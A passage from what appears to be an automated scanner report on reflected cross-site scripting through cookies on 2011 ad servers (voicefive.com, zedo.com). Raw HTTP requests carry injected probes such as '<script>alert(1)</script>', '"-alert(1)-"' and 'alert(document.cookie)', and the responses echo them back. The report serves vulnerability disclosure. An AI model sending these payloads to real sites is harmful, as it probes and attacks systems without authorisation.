Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810ef153<script>alert(1)</script>1aed363857

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296232643; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26297

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401349",Location:CO
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810ef153<script>alert(1)</script>1aed363857', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 2
...[SNIP]...

4.1032. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 4c0e5<script>alert(1)</script>8e340961025 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779\ HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296264969%2E946%2Cwait%2D%3E10000%2C; UID=1d29d89e-72.246.30.75-1294456810; ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&4c0e5<script>alert(1)</script>8e340961025; ar_p85001580=exp=23&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:36:09 2011&prad=58087449&arc=40400793&;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 05:21:01 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: ar_p45555483=exp=2&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 05:21:01 2011&4c0e5<script>alert(1)</script>8e340961025=&prad=59007464&arc=38601779%5C&; expires=Fri 29-Apr-2011 05:21:01 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27721

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"59007464",Pid:"p45555483",Arc:"38601779\",Location:C
...[SNIP]...
: '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296264969%2E946%2Cwait%2D%3E10000%2C', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&4c0e5<script>alert(1)</script>8e340961025', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.co
...[SNIP]...

4.1033. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 19ab0<script>alert(1)</script>eb1af63e5fc was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&19ab0<script>alert(1)</script>eb1af63e5fc; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&19ab0<script>alert(1)</script>eb1af63e5fc', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%
...[SNIP]...

4.1034. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 23425<script>alert(1)</script>3fbe48c0625 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&23425<script>alert(1)</script>3fbe48c0625; ar_p85001580=exp=14&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 00:14:19 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296260059%2E936%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 01:56:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=15&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:56:36 2011&prad=58087449&arc=39969205&; expires=Fri 29-Apr-2011 01:56:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26513

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO
...[SNIP]...
: '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296260059%2E936%2Cwait%2D%3E10000%2C', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&23425<script>alert(1)</script>3fbe48c0625' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

4.1035. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload be4b9<script>alert(1)</script>72311a1bd07 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&be4b9<script>alert(1)</script>72311a1bd07; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&be4b9<script>alert(1)</script>72311a1bd07=&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&be4b9<script>alert(1)</script>72311a1bd07', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.co
...[SNIP]...

4.1036. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [FFpb cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1aa4b(a)1243ae578bf was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'1aa4b(a)1243ae578bf; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1016
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'1aa4b(a)1243ae578bf;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=252
Expires: Fri, 28 Jan 2011 17:30:57 GMT
Date: Fri, 28 Jan 2011 17:26:45 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=;';


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='None,4f791'1aa4b(a)1243ae578bf';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=None,4f791'1aa4b(a)1243ae578bf;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;
v
...[SNIP]...

4.1037. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b470"-alert(1)-"e08a3e6143 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=39
Expires: Fri, 28 Jan 2011 16:42:00 GMT
Date: Fri, 28 Jan 2011 16:41:21 GMT
Connection: close
Content-Length: 1953

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
m();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143';

var zzhasAd=undefined;


               var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1038. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c31"-alert(1)-"9a8564b65f6 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
